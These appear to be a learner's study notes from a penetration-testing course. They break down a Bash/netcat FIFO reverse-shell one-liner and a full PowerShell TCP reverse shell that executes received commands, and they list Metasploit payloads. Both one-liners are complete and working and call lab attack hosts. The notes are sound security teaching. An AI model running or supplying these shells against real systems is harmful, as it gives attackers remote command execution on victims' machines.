#Powershell #bash ## Netcat/Bash Reverse Shell #One-liner Examined ```shell rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f ``` The commands above make up a common one-liner issued on a Linux system to serve a Bash shell on a network socket utilizing a Netcat listener. We used this earlier in the Bind Shells section. It's often copied & pasted but not often understood. Let's break down each portion of the one-liner: #### Remove /tmp/f ```shell rm -f /tmp/f; ``` Removes the `/tmp/f` file if it exists, `-f` causes `rm` to ignore nonexistent files. The semi-colon (`;`) is used to execute the command sequentially. #### Make A Named Pipe ```shell mkfifo /tmp/f; ``` Makes a [FIFO named pipe file](https://man7.org/linux/man-pages/man7/fifo.7.html) at the location specified. In this case, /tmp/f is the FIFO named pipe file, the semi-colon (`;`) is used to execute the command sequentially. #### Output Redirection ```shell cat /tmp/f | ``` Concatenates the FIFO named pipe file /tmp/f, the pipe (`|`) connects the standard output of cat /tmp/f to the standard input of the command that comes after the pipe (`|`). #### Set Shell Options ```shell /bin/bash -i 2>&1 | ``` Specifies the command language interpreter using the `-i` option to ensure the shell is interactive. `2>&1` ensures the standard error data stream (`2`) `&` standard output data stream (`1`) are redirected to the command following the pipe (`|`). #### Open a Connection with Netcat ```shell nc 10.10.14.12 7777 > /tmp/f ``` Uses Netcat to send a connection to our attack host `10.10.14.12` listening on port `7777`. The output will be redirected (`>`) to /tmp/f, serving the Bash shell to our waiting Netcat listener when the reverse shell one-liner command is executed --- ## PowerShell #One-liner Explained The shells & payloads we choose to use largely depend on which OS we are attacking. Be mindful of this as we continue throughout the module. We witnessed this in the reverse shells section by establishing a reverse shell with a Windows system using PowerShell. Let's breakdown the one-liner we used: #### Powershell One-liner ```powershell powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` We will dissect the rather large PowerShell command you can see above. It may look like a lot, but hopefully, we can demystify it a bit. #### Calling PowerShell ```powershell powershell -nop -c ``` Executes `powershell.exe` with no profile (`nop`) and executes the command/script block (`-c`) contained in the quotes. This particular command is issued inside of command-prompt, which is why PowerShell is at the beginning of the command. It's good to know how to do this if we discover a Remote Code Execution vulnerability that allows us to execute commands directly in `powershell.exe`. #### Binding A Socket ```powershell "$client = New-Object System.Net.Sockets.TCPClient(10.10.14.158,433); ``` Sets/evaluates the variable `$client` equal to (`=`) the `New-Object` powershelllet, which creates an instance of the `System.Net.Sockets.TCPClient` .NET framework object. The .NET framework object will connect with the TCP socket listed in the parentheses `(10.10.14.158,443)`. The semi-colon (`;`) ensures the commands & code are executed sequentially. #### Setting The Command Stream ```powershell $stream = $client.GetStream(); ``` Sets/evaluates the variable `$stream` equal to (`=`) the `$client` variable and the .NET framework method called [GetStream](https://docs.microsoft.com/en-us/dotnet/api/system.net.sockets.tcpclient.getstream?view=net-5.0) that facilitates network communications. The semi-colon (`;`) ensures the commands & code are executed sequentially. #### Empty Byte Stream ```powershell [byte[]]$bytes = 0..65535|%{0}; ``` Creates a byte type array (`[]`) called `$bytes` that returns 65,535 zeros as the values in the array. This is essentially an empty byte stream that will be directed to the TCP listener on an attack box awaiting a connection. #### Stream Parameters ```powershell while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) ``` Starts a `while` loop containing the `$i` variable set equal to (`=`) the .NET framework [Stream.Read](https://docs.microsoft.com/en-us/dotnet/api/system.io.stream.read?view=net-5.0) (`$stream.Read`) method. The parameters: buffer (`$bytes`), offset (`0`), and count (`$bytes.Length`) are defined inside the parentheses of the method. #### Set The Byte Encoding ```powershell {;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); ``` Sets/evaluates the variable `$data` equal to (`=`) an [ASCII](https://en.wikipedia.org/wiki/ASCII) encoding .NET framework class that will be used in conjunction with the `GetString` method to encode the byte stream (`$bytes`) into ASCII. In short, what we type won't just be transmitted and received as empty bits but will be encoded as ASCII text. The semi-colon (`;`) ensures the commands & code are executed sequentially. #### Invoke-Expression ```powershell $sendback = (iex $data 2>&1 | Out-String ); ``` Sets/evaluates the variable `$sendback` equal to (`=`) the Invoke-Expression (`iex`) powershelllet against the `$data` variable, then redirects the standard error (`2>`) `&` standard input (`1`) through a pipe (`|`) to the `Out-String` powershelllet which converts input objects into strings. Because Invoke-Expression is used, everything stored in $data will be run on the local computer. The semi-colon (`;`) ensures the commands & code are executed sequentially. #### Show Working Directory ```powershell $sendback2 = $sendback + 'PS ' + (pwd).path + '> '; ``` Sets/evaluates the variable `$sendback2` equal to (`=`) the `$sendback` variable plus (`+`) the string PS (`'PS'`) plus `+` path to the working directory (`(pwd).path`) plus (`+`) the string `'> '`. This will result in the shell prompt being PS C:\workingdirectoryofmachine >. The semi-colon (`;`) ensures the commands & code are executed sequentially. Recall that the + operator in programming combines strings when numerical values aren't in use, with the exception of certain languages like C and C++ where a function would be needed. #### Sets Sendbyte ```powershell $sendbyte= ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()} ``` Sets/evaluates the variable `$sendbyte` equal to (`=`) the ASCII encoded byte stream that will use a TCP client to initiate a PowerShell session with a Netcat listener running on the attack box. #### Terminate TCP Connection ```powershell $client.Close()" ``` This is the [TcpClient.Close](https://docs.microsoft.com/en-us/dotnet/api/system.net.sockets.tcpclient.close?view=net-5.0) method that will be used when the connection is terminated. ## [[Metasploit]] Payload | Description -|- generic/custom |Generic listener, multi-use generic/shell_bind_tcp |Generic listener, multi-use, normal shell, TCP connection binding generic/shell_reverse_tcp |Generic listener, multi-use, normal shell, reverse TCP connection windows/x64/exec | Executes an arbitrary command (Windows x64) windows/x64/loadlibrary |Loads an arbitrary x64 library path windows/x64/messagebox| Spawns a dialog via MessageBox using a customizable title, text & icon windows/x64/shell_reverse_tcp | Normal shell, single payload, reverse TCP connection windows/x64/shell/reverse_tcp |Normal shell, stager + stage, reverse TCP connection windows/x64/shell/bind_ipv6_tcp | Normal shell, stager + stage, IPv6 Bind TCP stager windows/x64/meterpreter/$ | Meterpreter payload + varieties above windows/x64/powershell/$ |Interactive PowerShell sessions + varieties above windows/x64/vncinject/$ |VNC Server (Reflective Injection) + varieties above If we want to look at the functioning of the `shikata_ga_nai` encoder, we can look at an excellent post [here](https://hatching.io/blog/metasploit-payloads2/)